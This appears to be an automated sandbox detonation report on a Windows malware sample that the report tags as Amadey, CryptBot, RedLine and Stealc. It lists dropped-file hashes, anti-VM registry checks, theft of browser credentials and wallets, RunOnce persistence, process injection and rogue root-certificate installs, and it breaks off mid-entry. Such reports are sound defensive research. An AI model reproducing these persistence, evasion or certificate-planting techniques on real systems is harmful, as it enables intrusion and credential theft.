| SHA1 | 73dc44fb0753296f51b851299f468031ceb77b54 |
| SHA256 | e6db7d34b498982601b2c45ac5b2a1c1b9502e502514ccffae9862f2aa719f42 |
| SHA512 | dadf36bc9c5d88c28b9064892cc263c912ce668435b71802df756c0a4e680f8407011d36498a2511dda7165aea866c0ae794f9ec8fbcc42c7da1661399316ce4 |
memory/2708-1629-0x0000024AE4FA0000-0x0000024AE4FC2000-memory.dmp
memory/2708-1633-0x0000024AE5150000-0x0000024AE51C6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dycfjjxx.dbt.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
C:\Users\Admin\AppData\Local\Temp\1000262001\385107.exe
| MD5 | 100300d3fc5c12e288cb4aaf5dc223c8 |
| SHA1 | 7bb89d387b3b8dae41a28fe48d69d33a4d568dfe |
| SHA256 | b503b28d565d4bde2f899aca2dc403da6398f20c92fe6bf2eef9083cd4e106ff |
| SHA512 | 2d9e3a2604d1055baf007cb66b9c9ad194c4dce22024c4d7d92466c77c266b4a802281495494d303770f6e869a7a41dcfaa372c7dac4946bc3f2e69e208f51f2 |
memory/1884-1677-0x0000000000E20000-0x00000000014CD000-memory.dmp
memory/1452-1685-0x0000000004850000-0x0000000004886000-memory.dmp
memory/1452-1686-0x0000000007420000-0x0000000007A48000-memory.dmp
memory/1452-1689-0x0000000007BF0000-0x0000000007C12000-memory.dmp
memory/1452-1691-0x0000000007D00000-0x0000000007D66000-memory.dmp
memory/1452-1692-0x0000000007DE0000-0x0000000008130000-memory.dmp
memory/1452-1700-0x0000000007CC0000-0x0000000007CDC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000268001\kitty.exe
| MD5 | 0ec1f7cc17b6402cd2df150e0e5e92ca |
| SHA1 | 8405b9bf28accb6f1907fbe28d2536da4fba9fc9 |
| SHA256 | 4c5ca5701285337a96298ebf994f8ba013d290c63afa65b5c2b05771fbbb9ed4 |
| SHA512 | 7caa2416bc7878493b62a184ddc844d201a9ab5282abfa77a616316af39ff65309e37bb566b3e29d9e764e08f4eda43a06464acaf9962f911b33e6dbc60c1861 |
memory/1452-1733-0x00000000091F0000-0x000000000920A000-memory.dmp
memory/1452-1732-0x0000000009540000-0x00000000095D4000-memory.dmp
memory/1452-1734-0x0000000009260000-0x0000000009282000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000296001\Channel3.exe
| MD5 | 80e238aaf61301785fac44e9e7e21fb3 |
| SHA1 | a91d7a47b22219a33eec684cb11711fcfa9d2cab |
| SHA256 | 23eb00fc9d25042dec9a2456623a4f19c282d878ece26d4a31a732d6d76eb234 |
| SHA512 | af69d12f2d7c03ddd4c5a3b203b017ebc8e90cbdcfdc133cc789e1def1bd82ed5e7d582b5529d00e19d9298e398a15ec7180b1b4c540ff34ba87df51da104db9 |
C:\Users\Admin\AppData\Local\Temp\1000306001\vlst.exe
| MD5 | 1b2583d84dca4708d7a0309cf1087a89 |
| SHA1 | cae0d1e16db95b9269b96c06caa66fa3dab99f48 |
| SHA256 | e0d9f3b8d36e9b4a44bc093b47ba3ba80cabd7e08b3f1a64dec7e3a2c5421bac |
| SHA512 | a51b8ed6a6cf403b4b19fc7e9f22d5f60265b16cdf24a7033bc0ee0da8c31861caa212dc5fb3bf17e28842fc28a263564076ad4e9905afd483763859bafd4493 |
memory/5800-1795-0x0000000000EA0000-0x0000000000F2C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000308001\freedom.exe
| MD5 | db5717fd494495eea3c8f7d4ab29d6b0 |
| SHA1 | 39ba82340121d9b08e9cf3d4ba6dfcb12eb6c559 |
| SHA256 | 6b59309ab12f1859a94fb2ce1c98639b2a538e6e098ffac127e45c29733bd993 |
| SHA512 | b16c7bffc8418a0349e5189d61439df325d2ab33a42c720380a305decde00348f83d96b6c263a95dc253128eb0e47b1a3dc96f8f115da868ff9227b9a40882de |
memory/2984-1809-0x0000000000320000-0x000000000033E000-memory.dmp
memory/5800-1821-0x000000001E0F0000-0x000000001E1FA000-memory.dmp
memory/5800-1822-0x000000001BCF0000-0x000000001BD02000-memory.dmp
memory/5800-1824-0x000000001CA80000-0x000000001CABE000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000309001\googleupdate.exe
| MD5 | 307dca9c775906b8de45869cabe98fcd |
| SHA1 | 2b80c3a2fd4a235b2cc9f89315a554d0721c0dd1 |
| SHA256 | 8437bd0ef46a19c9a7c294c53e0429b40e76ebbd5fe9fd73a9025752495ddb1c |
| SHA512 | 80c03f7add3a33a5df7b1f1665253283550dac484d26339ecd85672fb506dce44bd0bf96275d5c41a2e7369c3b604de377b7f5985d7d0d76c7ac663d60a67a1c |
memory/5800-1838-0x000000001BD30000-0x000000001BD4E000-memory.dmp
memory/5800-1839-0x000000001ED60000-0x000000001EF22000-memory.dmp
memory/5800-1840-0x00000000201C0000-0x00000000206E6000-memory.dmp
memory/1884-1841-0x0000000000E20000-0x00000000014CD000-memory.dmp
memory/6012-1859-0x0000000001000000-0x000000000108C000-memory.dmp
memory/6012-1860-0x0000000008210000-0x000000000825B000-memory.dmp
memory/2972-1865-0x0000000000E20000-0x00000000014CD000-memory.dmp
memory/5420-1866-0x0000000001180000-0x000000000161C000-memory.dmp
memory/5420-1868-0x0000000001180000-0x000000000161C000-memory.dmp
memory/4748-1871-0x0000000006690000-0x00000000069E0000-memory.dmp
memory/4748-1872-0x0000000006B30000-0x0000000006B7B000-memory.dmp
memory/2972-2136-0x0000000000E20000-0x00000000014CD000-memory.dmp
memory/2984-2141-0x000000001D2D0000-0x000000001D3EE000-memory.dmp
memory/2984-2142-0x000000001AF70000-0x000000001AF7E000-memory.dmp
memory/5616-2158-0x0000000001150000-0x00000000017FD000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6lk2b5bo.default-release\prefs.js
| MD5 | 83be125bccd24055ea130893405b23c7 |
| SHA1 | 69b2b69a19dbf7261ceacea1259dcd994af5254e |
| SHA256 | 26603d87f63481c87ee2c878d30cdf060d600bc1fdb3093533b0296d6dba0839 |
| SHA512 | aea748669291274ea8c1a0d0c5e66ddd53656f36d4e933350f46bb6e6e7f85089c8f3b1bebdddabd31f16c87be1dbb500ab6ca1d45c436d0da9fbce8a2a1b06c |
C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi
| MD5 | ef97755781b46171fc163cc443146dc7 |
| SHA1 | 9c1e5a3fb4f12bc48e03ed2a2f325fd5a935030e |
| SHA256 | d22b4dd97b4363ac9caf2624cc06213c90357ecca17398b7cca1a1fe4dce6950 |
| SHA512 | 9d0a671812ad96aa31a227131ad7b53088a3765c6c933444419ce723b1101dcbf27c33ef06014d109692514dc1b9c705b8987db1e282259f1ec0a3c158b017f1 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
| MD5 | 238d2612f510ea51d0d3eaa09e7136b1 |
| SHA1 | 0953540c6c2fd928dd03b38c43f6e8541e1a0328 |
| SHA256 | 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e |
| SHA512 | 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
| MD5 | 2a1e12a4811892d95962998e184399d8 |
| SHA1 | 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720 |
| SHA256 | 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb |
| SHA512 | bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
| MD5 | 0b1cf3deab325f8987f2ee31c6afc8ea |
| SHA1 | 6a51537cef82143d3d768759b21598542d683904 |
| SHA256 | 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf |
| SHA512 | 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f |
memory/5616-2426-0x0000000001150000-0x00000000017FD000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | cf28710bc6c1ef6aa1108de918cfc3b8 |
| SHA1 | bf1f9e4656bec5daa2461ed9c082f44111031c94 |
| SHA256 | 10827b0dd5bf39e839be21acb12acc6547b41860150668e75acf6ed7c40346bc |
| SHA512 | 8f1bd3a89d7e1e2b5fd3114ad3b2ccf449cb3da90e851ad18018d97ceebd5748e93e86a2aa7f52a03e61db9e2a459d9c8ad9ca3ed77c5001205c9e169c875476 |
memory/6016-2489-0x0000000000F70000-0x0000000000FFC000-memory.dmp
memory/5532-2495-0x0000000001180000-0x000000000161C000-memory.dmp
memory/5192-2521-0x0000000001180000-0x000000000161C000-memory.dmp
memory/5192-2525-0x0000000001180000-0x000000000161C000-memory.dmp
memory/1960-2559-0x0000000001180000-0x000000000161C000-memory.dmp
memory/1960-2562-0x0000000001180000-0x000000000161C000-memory.dmp
memory/5344-2566-0x0000000000700000-0x000000000078C000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-09-09 05:02
Reported
2024-09-09 05:07
Platform
win7-20240708-en
Max time kernel
291s
Max time network
263s
Command Line
Signatures
Amadey
CryptBot
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Stealc
Credentials from Password Stores: Credentials from Web Browsers
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\32840e92ff85953eb053cbd48e14155f9373064f1e6b991f26c00b541ea884c9.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
Downloads MZ/PE file
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\32840e92ff85953eb053cbd48e14155f9373064f1e6b991f26c00b541ea884c9.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\32840e92ff85953eb053cbd48e14155f9373064f1e6b991f26c00b541ea884c9.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\32840e92ff85953eb053cbd48e14155f9373064f1e6b991f26c00b541ea884c9.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\acentric = "\"C:\\Users\\Admin\\Pictures\\Opportunistic Telegraph\\acentric.exe\" /update" | C:\Users\Admin\AppData\Local\Temp\1000269001\acentric.exe | N/A |
Checks installed software on the system
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\32840e92ff85953eb053cbd48e14155f9373064f1e6b991f26c00b541ea884c9.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1296 set thread context of 3060 | N/A | C:\Users\Admin\AppData\Local\Temp\1000002001\gold.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 2276 set thread context of 2400 | N/A | C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 1736 set thread context of 1864 | N/A | C:\Users\Admin\AppData\Local\Temp\1000191001\needmoney.exe | C:\Users\Admin\AppData\Local\Temp\svchost015.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\Hkbsse.job | C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe | N/A |
| File created | C:\Windows\Tasks\axplong.job | C:\Users\Admin\AppData\Local\Temp\32840e92ff85953eb053cbd48e14155f9373064f1e6b991f26c00b541ea884c9.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\UUzqnLVZ2x.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\e7f7qWroxW.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000259001\bundle.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000129001\Sеtup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\32840e92ff85953eb053cbd48e14155f9373064f1e6b991f26c00b541ea884c9.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000269001\acentric.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000191001\needmoney.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000026001\joffer2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000254001\penis.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\svchost015.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\filename.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000002001\gold.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\1000129001\Sеtup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\1000129001\Sеtup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\1000026001\joffer2.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\1000026001\joffer2.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 190000000100000010000000dbd91ea86008fd8536f2b37529666c7b0f000000010000002000000020d814fd5fc477ce74425e441d8f5b48d38db6f1dd119441bc35777689bd094c030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b0640200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e003000000000000b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f0072006900740079000000140000000100000014000000f352eacf816860c1097c4b852f4332dd93eb5d4f20000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 | C:\Users\Admin\AppData\Roaming\e7f7qWroxW.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | C:\Users\Admin\AppData\Local\Temp\1000259001\bundle.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 | C:\Users\Admin\AppData\Local\Temp\1000259001\bundle.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 | C:\Users\Admin\AppData\Roaming\e7f7qWroxW.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 